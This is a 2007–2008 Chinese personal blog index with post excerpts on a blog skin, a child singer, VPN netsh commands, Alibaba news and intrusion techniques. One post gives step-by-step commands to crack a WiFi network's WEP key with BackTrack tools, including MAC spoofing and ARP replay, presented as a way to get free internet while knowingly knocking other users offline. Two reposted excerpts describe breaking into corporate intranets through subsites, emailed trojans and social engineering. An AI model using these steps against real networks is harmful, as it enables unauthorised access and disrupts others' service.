做了一个新皮肤-Surface Style for Pjblog Skin

作者:Kane 日期:2007-07-27

[fm942.net ]942生活就是爱生活频率

作者:Kane 日期:2007-06-07

林妙可演唱《歌唱祖国》[08奥运会开幕式]

作者:Kane 日期:2008-08-09

姓名：林妙可
拼音：limiaoke
描述：小公主
生日：2000年1月1日
现住地：北京
籍贯：北京
民族：汉族
身高：122厘米
体重：20公斤
年龄：9岁
地区：大陆
国籍：中国
语言：普通话
特长：表演,唱歌,舞蹈,钢琴
职业：影视演员
经历：2008奥运会开幕式《歌唱祖国》演唱者

http://flv1.video.cctv.com/8/7/3/6/6378/125478/32122368.flv

分类:MyFav | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 90

[原创]用BT3破解WIFI WEP加密

作者:Kane 日期:2008-07-28

下了个BT3(Back Track 3)，上YouTube看了段破解WEP的视频。自己实现了一下，结果真的行了。wifi的WEP 加密真的很脆弱，不过以后看见wifi基本就可以上网囖。哈哈。

一、试验环境

1.需要一张支持在linux使用airodump ，aircrack 的无线网卡。网上很多资料，自己去找吧。

2.下载BT3 ISO 刻盘，然后从光盘启动进入 KDE BT 里面。

二、过程步骤：

1.在菜单栏的Internet 中找到 wireless assistant 并打开。里面可以看到附近的无线网络。看看有没有加密了网络。这里我只测试了WEP的加密。如果提示无找到网络，会自动关闭。需要从新检查一下你的无线网卡。

2. 接下来是开第一shell 开始输入命令啦：

1）输入 airmon-ng 返回无线网卡列表，要看清楚哪张网卡哦！我这里是wifi0

2）airmon-ng stop wifi0

3) ifconfig wif0 down

4）macchanger -m 00:11:22:33:44:55 wifi0 修改网卡的mac地址

5）airmon-ng start wifi0 启动完成后会再次列出所有的无线网卡。有写网卡会提示继承父级的驱动。估计这里的意思是，BT3自带了破解的驱动吧。呵呵..

6）设置网卡ko了，就开始airodump啦！

输入 airodump-ng wifi0 ，成功后会出现一个列表，而且不断的有pack进出。如果无返回这个列表，就需要改一下，看看刚才上面arimon-ng列出来的网卡。然后换一个网卡来dump。我这里是 airodump-ng ath1. 列表如果出来，就按 ctrl+C 停止。然后找到你要破解的网络的BSSID并且copy下来,还有要看清楚他的channel 和essid.

7) airodump-ng -c 要破解的channel -w wep123 --bssid 粘贴刚刚的BSSID

这里的wep123是随便输入的，后面需要用的哦。

3. 再开一个Shell输入：

1） aireplay-ng -1 -0 -a 粘贴刚刚的BSSID -h 00:11:22:33:44:55 -e 要破解的essid ath1

回车后，会返回一段东西里面有success的字样。具体是什么没太留意啦。就直接下一步了。也不知道失败是返回什么了。

2） airepaly-ng -3 -b 粘贴刚刚的BSSID -h 00:11:22:33:44:55 ath1

这里就直接arp了整个wifi网络。在wifi里面的人估计就上不了网了。所以接下来要速度点。如果里面的没人..那我就不知道会怎么样了。哈哈.因为需要截取一定量的数据包才能破解出密码。

4. 再开一个shell输入：

aircrack-ng -n 64 0b 粘贴刚刚的BSSID wep123_01.cap

这里不要这么快按回车，有两个地方需要注意的。第一是wep123_01.cap，需要确认一下名称，去home目录看看是不是这个名字。第二看看第一个shell窗口的数据包是否过W。如果都ko了，就按回车看结果吧。

key found: 后面这些就是密码啦。

分类:Security | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 431

Get domain controller info

作者:Kane 日期:2008-07-26

大学的时候玩过下域，但现在都忘记了。要好好恶补下才得.. 呵呵.

入了域的机器可以通过下面的命令获取域的相关信息。

获取域的用户列表:

Tags: dc dc 域控制器域控制器域域

分类:Security | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 113

马云致信阿里巴巴全体员工号召准备过冬

作者:Kane 日期:2008-07-24

新闻来源:新浪科技
7月23日晚间消息，阿里巴巴集团董事局主席马云刚刚发布内部邮件，号召阿里巴巴全体准备“过冬”，以下为该邮件全文：
各位阿里人：

对阿里巴巴B2B的股价走势，我想大家的心情一定很复杂！今天想和大家聊聊我对目前大局形势和未来的一些看法，也许对大家会有一点帮助。

Tags: 阿里巴巴阿里巴巴

分类:ITNews | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 127

Dos 的VPN 常用命令

作者:Kane 日期:2008-07-22

netsh ras set user administrator permit #允许administrator拨入该VPN
netsh ras set user administrator deny #禁止administrator拨入该VPN
netsh ras show user #查看哪些用户可以拨入VPN
netsh ras ip show config #查看VPN分配IP的方式
netsh ras ip set addrassign method = pool #使用地址池的方式分配IP
netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254 #地址池的范围是从192.168.3.1到192.168.3.254

分类:MyArticle | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 129

[转]内网渗透---常用手法

作者:Kane 日期:2008-07-22

内网，很多人应该形成了这个概念，很多大型网络的外部网站或是服务器不一定有用，当然外网也是一个突破口。很多时候我们直接从外网入手，随着安全的不断加固，已变得越来越困难。那么黑客通常是怎么进行内网渗透的，内网渗透又是怎样与社会工程学联系起来呢，今天主要描述黑客内网渗透的常用操作手法，关于如何获得内网机器，请查找我以前的一篇文章《内网渗透---如何打开突破口》。

渗透的过程就是一个信息刺探、利用、思考、突破的过程。首先在我们获得一台内网的机器后应该怎么做，当然是信息刺探。
一．信息刺探
1．当前机器的人物身份，当前控制的这台机器人物是一个什么样的身份，客服、销售人员还是开发人员，还是管理员。客服会做些什么，会通过什么方式跟其它人联系；开发人员在开发什么，应该会跟管理员联系，也会有一定的外网管理权限和内网测试服务器，这种情况下内网测试服务器是可以搞定的。如果是客服机器或是销售人员机器呢，他一定有整个公司或是网络的联系方式，自己发挥想象去。是管理员机器的话就不用说。
2．当前网络结构的分析，是域结构，还是划分vlan的结构，大多数大型网络是域结构。一般外网的服务器都是有硬件防火墙的，并且指定内网的某些机器的mac才可以连接。所以我们先看看内网情况：

分类:Security | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 130

[转]内网渗透--如何打开突破口

作者:Kane 日期:2008-07-22

内网渗透的思想是源于特洛伊木马的思想---堡垒最容易从内部攻破，一个大型的网站，一个大型的公司，一个大型的目标，在外肉，管理员总会千方百计的加强防范和修补漏洞，常规的方法进去几乎是不可能。
内网渗透的突破口是我们如何得到一个内网的个人机或是内网的服务器，我个人的经验有三种，一是从外网分站渗透到内网，二是发木马信得到内网机器，三是利用取得信任得到内网机器。

一、从外网分站渗透到内网
通常一个大的站点都有很多分站，有很多我们未知的分站或是未知的站点目录，越大的站点展现在我们面前的机会就越多，可以利用传统手法得到一个分站的服务器权限，比如注入，猜解，溢出等。得到分站服务器的情况下有两种思想：一是通过分站渗到主站或是其它分站，需要它们分配有一个内网并没划分vlan的情况，这时可以通过取得密码或是内网嗅探等方式取得更多的分站。二是通过分站服务器的分析，诱使管理员中马，比如在分站服务器取得管理员的密码，收集分站上的邮箱信息，查看分站服务器的ftp信息，收集管理员常用的工具，或是管理员有可能下载回去的文件（通常是管理员传输工具的tools文件里）或是管理员保存在站点目录的工具。

分类:Security | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 145